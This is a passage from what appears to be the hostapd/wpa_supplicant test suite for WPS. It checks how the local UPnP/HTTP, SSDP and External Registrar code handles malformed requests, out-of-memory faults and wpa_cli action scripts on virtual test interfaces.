for cmd in [ "PUT", "DELETE", "TRACE", "CONNECT", "M-SEARCH", "M-POST" ]:
try:
conn.request(cmd, "hello")
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
headers = { "Content-Length": 'abc' }
conn.request("HEAD", "hello", "\r\n\r\n", headers)
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
headers = { "Content-Length": '-10' }
conn.request("HEAD", "hello", "\r\n\r\n", headers)
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
headers = { "Content-Length": '10000000000000' }
conn.request("HEAD", "hello", "\r\n\r\nhello", headers)
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
headers = { "Transfer-Encoding": 'abc' }
conn.request("HEAD", "hello", "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 501:
raise Exception("Unexpected response to HEAD: " + str(resp.status))
conn.close()
headers = { "Transfer-Encoding": 'chunked' }
conn.request("HEAD", "hello", "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 501:
raise Exception("Unexpected response to HEAD: " + str(resp.status))
conn.close()
# Too long a header
conn.request("HEAD", 5000 * 'A')
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
# Long URL but within header length limits
conn.request("HEAD", 3000 * 'A')
resp = conn.getresponse()
if resp.status != 501:
raise Exception("Unexpected response to HEAD: " + str(resp.status))
conn.close()
headers = { "Content-Length": '20' }
conn.request("POST", "hello", 10 * 'A' + "\r\n\r\n", headers)
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
conn.request("POST", "hello", 5000 * 'A' + "\r\n\r\n")
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP response: %d" % resp.status)
conn.close()
conn.request("POST", "hello", 60000 * 'A' + "\r\n\r\n")
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
def test_ap_wps_upnp_http_proto_chunked(dev, apdev):
"""WPS AP and UPnP/HTTP protocol testing for chunked encoding"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
url = urlparse(location)
conn = HTTPConnection(url.netloc)
#conn.set_debuglevel(1)
headers = { "Transfer-Encoding": 'chunked' }
conn.request("POST", "hello",
"a\r\nabcdefghij\r\n" + "2\r\nkl\r\n" + "0\r\n\r\n",
headers)
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP response: %d" % resp.status)
conn.close()
conn.putrequest("POST", "hello")
conn.putheader('Transfer-Encoding', 'chunked')
conn.endheaders()
conn.send(b"a\r\nabcdefghij\r\n")
time.sleep(0.1)
conn.send(b"2\r\nkl\r\n")
conn.send(b"0\r\n\r\n")
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP response: %d" % resp.status)
conn.close()
conn.putrequest("POST", "hello")
conn.putheader('Transfer-Encoding', 'chunked')
conn.endheaders()
completed = False
try:
for i in range(20000):
conn.send(b"1\r\nZ\r\n")
conn.send(b"0\r\n\r\n")
resp = conn.getresponse()
completed = True
except Exception as e:
pass
conn.close()
if completed:
raise Exception("Too long chunked request did not result in connection reset")
headers = { "Transfer-Encoding": 'chunked' }
conn.request("POST", "hello", "80000000\r\na", headers)
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
conn.request("POST", "hello", "10000000\r\na", headers)
try:
resp = conn.getresponse()
except Exception as e:
pass
conn.close()
@remote_compatible
def test_ap_wps_disabled(dev, apdev):
"""WPS operations while WPS is disabled"""
ssid = "test-wps-disabled"
hapd = hostapd.add_ap(apdev[0], { "ssid": ssid })
if "FAIL" not in hapd.request("WPS_PBC"):
raise Exception("WPS_PBC succeeded unexpectedly")
if "FAIL" not in hapd.request("WPS_CANCEL"):
raise Exception("WPS_CANCEL succeeded unexpectedly")
def test_ap_wps_mixed_cred(dev, apdev):
"""WPS 2.0 STA merging mixed mode WPA/WPA2 credentials"""
ssid = "test-wps-wep"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"skip_cred_build": "1", "extra_cred": "wps-mixed-cred" }
hapd = hostapd.add_ap(apdev[0], params)
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=30)
if ev is None:
raise Exception("WPS-SUCCESS event timed out")
nets = dev[0].list_networks()
if len(nets) != 1:
raise Exception("Unexpected number of network blocks")
id = nets[0]['id']
proto = dev[0].get_network(id, "proto")
if proto != "WPA RSN":
raise Exception("Unexpected merged proto field value: " + proto)
pairwise = dev[0].get_network(id, "pairwise")
p = pairwise.split()
if "CCMP" not in p or "TKIP" not in p:
raise Exception("Unexpected merged pairwise field value: " + pairwise)
@remote_compatible
def test_ap_wps_while_connected(dev, apdev):
"""WPS PBC provisioning while connected to another AP"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
hostapd.add_ap(apdev[1], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
if status['bssid'] != apdev[0]['bssid']:
raise Exception("Unexpected BSSID")
@remote_compatible
def test_ap_wps_while_connected_no_autoconnect(dev, apdev):
"""WPS PBC provisioning while connected to another AP and STA_AUTOCONNECT disabled"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
hostapd.add_ap(apdev[1], { "ssid": "open" })
try:
dev[0].request("STA_AUTOCONNECT 0")
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
if status['bssid'] != apdev[0]['bssid']:
raise Exception("Unexpected BSSID")
finally:
dev[0].request("STA_AUTOCONNECT 1")
@remote_compatible
def test_ap_wps_from_event(dev, apdev):
"""WPS PBC event on AP to enable PBC"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
hapd.dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
ev = hapd.wait_event(['WPS-ENROLLEE-SEEN'], timeout=15)
if ev is None:
raise Exception("No WPS-ENROLLEE-SEEN event on AP")
vals = ev.split(' ')
if vals[1] != dev[0].p2p_interface_addr():
raise Exception("Unexpected enrollee address: " + vals[1])
if vals[5] != '4':
raise Exception("Unexpected Device Password Id: " + vals[5])
hapd.request("WPS_PBC")
dev[0].wait_connected(timeout=30)
def test_ap_wps_ap_scan_2(dev, apdev):
"""AP_SCAN 2 for WPS"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
hapd.request("WPS_PBC")
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5", drv_params="force_connect_cmd=1")
wpas.dump_monitor()
if "OK" not in wpas.request("AP_SCAN 2"):
raise Exception("Failed to set AP_SCAN 2")
wpas.flush_scan_cache()
wpas.scan_for_bss(apdev[0]['bssid'], freq="2412")
wpas.dump_monitor()
wpas.request("WPS_PBC " + apdev[0]['bssid'])
ev = wpas.wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS-SUCCESS event timed out")
wpas.wait_connected(timeout=30)
wpas.dump_monitor()
wpas.request("DISCONNECT")
wpas.wait_disconnected()
id = wpas.list_networks()[0]['id']
pairwise = wpas.get_network(id, "pairwise")
if "CCMP" not in pairwise.split():
raise Exception("Unexpected pairwise parameter value: " + pairwise)
group = wpas.get_network(id, "group")
if "CCMP" not in group.split():
raise Exception("Unexpected group parameter value: " + group)
# Need to select a single cipher for ap_scan=2 testing
wpas.set_network(id, "pairwise", "CCMP")
wpas.set_network(id, "group", "CCMP")
wpas.request("BSS_FLUSH 0")
wpas.dump_monitor()
wpas.request("REASSOCIATE")
wpas.wait_connected(timeout=30)
wpas.dump_monitor()
@remote_compatible
def test_ap_wps_eapol_workaround(dev, apdev):
"""EAPOL workaround code path for 802.1X header length mismatch"""
ssid = "test-wps"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1" })
bssid = apdev[0]['bssid']
hapd.request("SET ext_eapol_frame_io 1")
dev[0].request("SET ext_eapol_frame_io 1")
hapd.request("WPS_PBC")
dev[0].request("WPS_PBC")
ev = hapd.wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("Timeout on EAPOL-TX from hostapd")
res = dev[0].request("EAPOL_RX " + bssid + " 020000040193000501FFFF")
if "OK" not in res:
raise Exception("EAPOL_RX to wpa_supplicant failed")
def test_ap_wps_iteration(dev, apdev):
"""WPS PIN and iterate through APs without selected registrar"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
ssid2 = "test-wps-conf2"
hapd2 = hostapd.add_ap(apdev[1],
{ "ssid": ssid2, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].scan_for_bss(apdev[1]['bssid'], freq="2412")
dev[0].dump_monitor()
pin = dev[0].request("WPS_PIN any")
# Wait for iteration through all WPS APs to happen before enabling any
# Registrar.
for i in range(2):
ev = dev[0].wait_event(["Associated with"], timeout=30)
if ev is None:
raise Exception("No association seen")
ev = dev[0].wait_event(["WPS-M2D"], timeout=10)
if ev is None:
raise Exception("No M2D from AP")
dev[0].wait_disconnected()
    # Verify that each AP requested the PIN
ev = hapd.wait_event(["WPS-PIN-NEEDED"], timeout=1)
if ev is None:
raise Exception("No WPS-PIN-NEEDED event from AP")
ev = hapd2.wait_event(["WPS-PIN-NEEDED"], timeout=1)
if ev is None:
raise Exception("No WPS-PIN-NEEDED event from AP2")
    # Provide the PIN to one of the APs and verify that the connection gets formed
hapd.request("WPS_PIN any " + pin)
dev[0].wait_connected(timeout=30)
def test_ap_wps_iteration_error(dev, apdev):
"""WPS AP iteration on no Selected Registrar and error case with an AP"""
ssid = "test-wps-conf-pin"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_independent": "1" })
hapd.request("SET ext_eapol_frame_io 1")
bssid = apdev[0]['bssid']
pin = dev[0].wps_read_pin()
dev[0].request("WPS_PIN any " + pin)
ev = hapd.wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("No EAPOL-TX (EAP-Request/Identity) from hostapd")
dev[0].request("EAPOL_RX " + bssid + " " + ev.split(' ')[2])
ev = hapd.wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("No EAPOL-TX (EAP-WSC/Start) from hostapd")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("No CTRL-EVENT-EAP-STARTED")
# Do not forward any more EAPOL frames to test wpa_supplicant behavior for
# a case with an incorrectly behaving WPS AP.
# Start the real target AP and activate registrar on it.
hapd2 = hostapd.add_ap(apdev[1],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_independent": "1" })
hapd2.request("WPS_PIN any " + pin)
dev[0].wait_disconnected(timeout=15)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("No CTRL-EVENT-EAP-STARTED for the second AP")
ev = dev[0].wait_event(["WPS-CRED-RECEIVED"], timeout=15)
if ev is None:
raise Exception("No WPS-CRED-RECEIVED for the second AP")
dev[0].wait_connected(timeout=15)
@remote_compatible
def test_ap_wps_priority(dev, apdev):
"""WPS PIN provisioning with configured AP and wps_priority"""
ssid = "test-wps-conf-pin"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
try:
dev[0].request("SET wps_priority 6")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
netw = dev[0].list_networks()
prio = dev[0].get_network(netw[0]['id'], 'priority')
if prio != '6':
raise Exception("Unexpected network priority: " + prio)
finally:
dev[0].request("SET wps_priority 0")
@remote_compatible
def test_ap_wps_and_non_wps(dev, apdev):
"""WPS and non-WPS AP in single hostapd process"""
params = { "ssid": "wps", "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0], params)
params = { "ssid": "no wps" }
hapd2 = hostapd.add_ap(apdev[1], params)
appin = hapd.request("WPS_AP_PIN random")
if "FAIL" in appin:
raise Exception("Could not generate random AP PIN")
if appin not in hapd.request("WPS_AP_PIN get"):
raise Exception("Could not fetch current AP PIN")
if "FAIL" in hapd.request("WPS_PBC"):
raise Exception("WPS_PBC failed")
if "FAIL" in hapd.request("WPS_CANCEL"):
raise Exception("WPS_CANCEL failed")
def test_ap_wps_init_oom(dev, apdev):
"""Initial AP configuration and OOM during PSK generation"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0], params)
with alloc_fail(hapd, 1, "base64_gen_encode;?base64_encode;wps_build_cred"):
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_disconnected()
hapd.request("WPS_PIN any " + pin)
dev[0].wait_connected(timeout=30)
@remote_compatible
def test_ap_wps_er_oom(dev, apdev):
"""WPS ER OOM in XML processing"""
try:
_test_ap_wps_er_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
dev[1].request("WPS_CANCEL")
dev[0].request("DISCONNECT")
def _test_ap_wps_er_oom(dev, apdev):
ssid = "wps-er-ap-config"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
dev[0].connect(ssid, psk="12345678", scan_freq="2412")
with alloc_fail(dev[0], 1,
"base64_gen_decode;?base64_decode;xml_get_base64_item"):
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=3)
if ev is not None:
raise Exception("Unexpected AP discovery")
dev[0].request("WPS_ER_STOP")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=10)
if ev is None:
raise Exception("AP discovery timed out")
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
with alloc_fail(dev[0], 1,
"base64_gen_decode;?base64_decode;xml_get_base64_item"):
dev[1].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], timeout=10)
if ev is None:
raise Exception("PBC scan failed")
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=15)
if ev is None:
raise Exception("Enrollee discovery timed out")
@remote_compatible
def test_ap_wps_er_init_oom(dev, apdev):
"""WPS ER and OOM during init"""
try:
_test_ap_wps_er_init_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_init_oom(dev, apdev):
with alloc_fail(dev[0], 1, "wps_er_init"):
if "FAIL" not in dev[0].request("WPS_ER_START ifname=lo"):
raise Exception("WPS_ER_START succeeded during OOM")
with alloc_fail(dev[0], 1, "http_server_init"):
if "FAIL" not in dev[0].request("WPS_ER_START ifname=lo"):
raise Exception("WPS_ER_START succeeded during OOM")
with alloc_fail(dev[0], 2, "http_server_init"):
if "FAIL" not in dev[0].request("WPS_ER_START ifname=lo"):
raise Exception("WPS_ER_START succeeded during OOM")
with alloc_fail(dev[0], 1, "eloop_sock_table_add_sock;?eloop_register_sock;wps_er_ssdp_init"):
if "FAIL" not in dev[0].request("WPS_ER_START ifname=lo"):
raise Exception("WPS_ER_START succeeded during OOM")
with fail_test(dev[0], 1, "os_get_random;wps_er_init"):
if "FAIL" not in dev[0].request("WPS_ER_START ifname=lo"):
raise Exception("WPS_ER_START succeeded during os_get_random failure")
@remote_compatible
def test_ap_wps_er_init_fail(dev, apdev):
"""WPS ER init failure"""
if "FAIL" not in dev[0].request("WPS_ER_START ifname=does-not-exist"):
dev[0].request("WPS_ER_STOP")
raise Exception("WPS_ER_START with non-existing ifname succeeded")
def test_ap_wps_wpa_cli_action(dev, apdev, test_params):
"""WPS events and wpa_cli action script"""
logdir = os.path.abspath(test_params['logdir'])
pidfile = os.path.join(logdir, 'ap_wps_wpa_cli_action.wpa_cli.pid')
logfile = os.path.join(logdir, 'ap_wps_wpa_cli_action.wpa_cli.res')
actionfile = os.path.join(logdir, 'ap_wps_wpa_cli_action.wpa_cli.action.sh')
with open(actionfile, 'w') as f:
f.write('#!/bin/sh\n')
f.write('echo $* >> %s\n' % logfile)
        # Kill the wpa_cli process and wait a moment before returning so
        # that all pending events get processed, some of them after the
        # eloop SIGALRM signal has been scheduled.
f.write('if [ $2 = "WPS-SUCCESS" -a -r %s ]; then kill `cat %s`; sleep 1; fi\n' % (pidfile, pidfile))
os.chmod(actionfile, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC |
stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
prg = os.path.join(test_params['logdir'],
'alt-wpa_supplicant/wpa_supplicant/wpa_cli')
if not os.path.exists(prg):
prg = '../../wpa_supplicant/wpa_cli'
arg = [ prg, '-P', pidfile, '-B', '-i', dev[0].ifname, '-a', actionfile ]
subprocess.call(arg)
arg = [ 'ps', 'ax' ]
cmd = subprocess.Popen(arg, stdout=subprocess.PIPE)
out = cmd.communicate()[0].decode()
cmd.wait()
logger.debug("Processes:\n" + out)
if "wpa_cli -P %s -B -i %s" % (pidfile, dev[0].ifname) not in out:
raise Exception("Did not see wpa_cli running")
hapd.request("WPS_PIN any 12345670")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[0].wait_connected(timeout=30)
for i in range(30):
if not os.path.exists(pidfile):
break
time.sleep(0.1)
if not os.path.exists(logfile):
raise Exception("wpa_cli action results file not found")
with open(logfile, 'r') as f:
res = f.read()
if "WPS-SUCCESS" not in res:
raise Exception("WPS-SUCCESS event not seen in action file")
arg = [ 'ps', 'ax' ]
cmd = subprocess.Popen(arg, stdout=subprocess.PIPE)
out = cmd.communicate()[0].decode()
cmd.wait()
logger.debug("Remaining processes:\n" + out)
if "wpa_cli -P %s -B -i %s" % (pidfile, dev[0].ifname) in out:
raise Exception("wpa_cli still running")
if os.path.exists(pidfile):
raise Exception("PID file not removed")
def test_ap_wps_er_ssdp_proto(dev, apdev):
"""WPS ER SSDP protocol testing"""
try:
_test_ap_wps_er_ssdp_proto(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_ssdp_proto(dev, apdev):
socket.setdefaulttimeout(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("239.255.255.250", 1900))
if "FAIL" not in dev[0].request("WPS_ER_START ifname=lo foo"):
raise Exception("Invalid filter accepted")
if "OK" not in dev[0].request("WPS_ER_START ifname=lo 1.2.3.4"):
raise Exception("WPS_ER_START with filter failed")
(msg,addr) = sock.recvfrom(1000)
msg = msg.decode()
logger.debug("Received SSDP message from %s: %s" % (str(addr), msg))
if "M-SEARCH" not in msg:
raise Exception("Not an M-SEARCH")
sock.sendto(b"FOO", addr)
time.sleep(0.1)
dev[0].request("WPS_ER_STOP")
dev[0].request("WPS_ER_START ifname=lo")
(msg,addr) = sock.recvfrom(1000)
msg = msg.decode()
logger.debug("Received SSDP message from %s: %s" % (str(addr), msg))
if "M-SEARCH" not in msg:
raise Exception("Not an M-SEARCH")
sock.sendto(b"FOO", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nFOO\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nNTS:foo\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nNTS:ssdp:byebye\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\ncache-control: foo=1\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\ncache-control: max-age=1\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nusn:\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nusn:foo\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nusn: uuid:\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nusn: uuid: \r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nusn: uuid: foo\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nNTS:ssdp:byebye\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:foo\r\n\r\n", addr)
with alloc_fail(dev[0], 1, "wps_er_ap_add"):
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:foo\r\ncache-control:max-age=1\r\n\r\n", addr)
time.sleep(0.1)
with alloc_fail(dev[0], 2, "wps_er_ap_add"):
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:foo\r\ncache-control:max-age=1\r\n\r\n", addr)
time.sleep(0.1)
    # Add an AP with a bogus URL
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:foo\r\ncache-control:max-age=1\r\n\r\n", addr)
    # Update the timeout on the AP without updating the URL
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:http://127.0.0.1:12345/foo.xml\r\ncache-control:max-age=1\r\n\r\n", addr)
ev = dev[0].wait_event(["WPS-ER-AP-REMOVE"], timeout=5)
if ev is None:
raise Exception("No WPS-ER-AP-REMOVE event on max-age timeout")
    # Add an AP with a valid URL (but no server listening on it)
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:http://127.0.0.1:12345/foo.xml\r\ncache-control:max-age=1\r\n\r\n", addr)
ev = dev[0].wait_event(["WPS-ER-AP-REMOVE"], timeout=5)
if ev is None:
raise Exception("No WPS-ER-AP-REMOVE event on max-age timeout")
sock.close()
wps_event_url = None
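# The gen_* helpers below produce canned HTTP responses emulating the UPnP
# endpoints of a WPS AP (device description document, GetDeviceInfo SOAP
# response, and event subscription reply) for the WPS ER protocol tests.
# Their parameters allow individual fields to be overridden or dropped so
# that ER parser error paths can be exercised.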
def gen_upnp_info(eventSubURL='wps_event', controlURL='wps_control',
udn='uuid:27ea801a-9e5c-4e73-bd82-f89cbcd10d7e'):
payload = '''<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
<deviceType>urn:schemas-wifialliance-org:device:WFADevice:1</deviceType>
<friendlyName>WPS Access Point</friendlyName>
<manufacturer>Company</manufacturer>
<modelName>WAP</modelName>
<modelNumber>123</modelNumber>
<serialNumber>12345</serialNumber>
'''
if udn:
payload += '<UDN>' + udn + '</UDN>'
payload += '''<serviceList>
<service>
<serviceType>urn:schemas-wifialliance-org:service:WFAWLANConfig:1</serviceType>
<serviceId>urn:wifialliance-org:serviceId:WFAWLANConfig1</serviceId>
<SCPDURL>wps_scpd.xml</SCPDURL>
'''
if controlURL:
payload += '<controlURL>' + controlURL + '</controlURL>\n'
if eventSubURL:
payload += '<eventSubURL>' + eventSubURL + '</eventSubURL>\n'
payload += '''</service>
</serviceList>
</device>
</root>
'''
hdr = 'HTTP/1.1 200 OK\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
return (hdr + payload).encode()
def gen_wps_control(payload_override=None):
payload = '''<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:GetDeviceInfoResponse xmlns:u="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
<NewDeviceInfo>EEoAARAQIgABBBBHABAn6oAanlxOc72C+Jy80Q1+ECAABgIAAAADABAaABCJZ7DPtbU3Ust9
Z3wJF07WEDIAwH45D3i1OqB7eJGwTzqeapS71h3KyXncK2xJZ+xqScrlorNEg6LijBJzG2Ca
+FZli0iliDJd397yAx/jk4nFXco3q5ylBSvSw9dhJ5u1xBKSnTilKGlUHPhLP75PUqM3fot9
7zwtFZ4bx6x1sBA6oEe2d0aUJmLumQGCiKEIWlnxs44zego/2tAe81bDzdPBM7o5HH/FUhD+
KoGzFXp51atP+1n9Vta6AkI0Vye99JKLcC6Md9dMJltSVBgd4Xc4lRAEAAIAIxAQAAIADRAN
AAEBEAgAAgAEEEQAAQIQIQAHQ29tcGFueRAjAANXQVAQJAADMTIzEEIABTEyMzQ1EFQACAAG
AFDyBAABEBEAC1dpcmVsZXNzIEFQEDwAAQEQAgACAAAQEgACAAAQCQACAAAQLQAEgQIDABBJ
AAYANyoAASA=
</NewDeviceInfo>
</u:GetDeviceInfoResponse>
</s:Body>
</s:Envelope>
'''
if payload_override:
payload = payload_override
hdr = 'HTTP/1.1 200 OK\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
return (hdr + payload).encode()
def gen_wps_event(sid='uuid:7eb3342a-8a5f-47fe-a585-0785bfec6d8a'):
payload = ""
hdr = 'HTTP/1.1 200 OK\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n'
if sid:
hdr += 'SID: ' + sid + '\r\n'
hdr += 'Timeout: Second-1801\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
return (hdr + payload).encode()
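# Minimal HTTP request handler for the emulated AP. It dispatches on the
# request line and records the event callback URL that the ER announces in
# the CALLBACK header of its SUBSCRIBE request.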
class WPSAPHTTPServer(StreamRequestHandler):
def handle(self):
data = self.rfile.readline().decode().strip()
logger.info("HTTP server received: " + data)
while True:
hdr = self.rfile.readline().decode().strip()
if len(hdr) == 0:
break
logger.info("HTTP header: " + hdr)
if "CALLBACK:" in hdr:
global wps_event_url
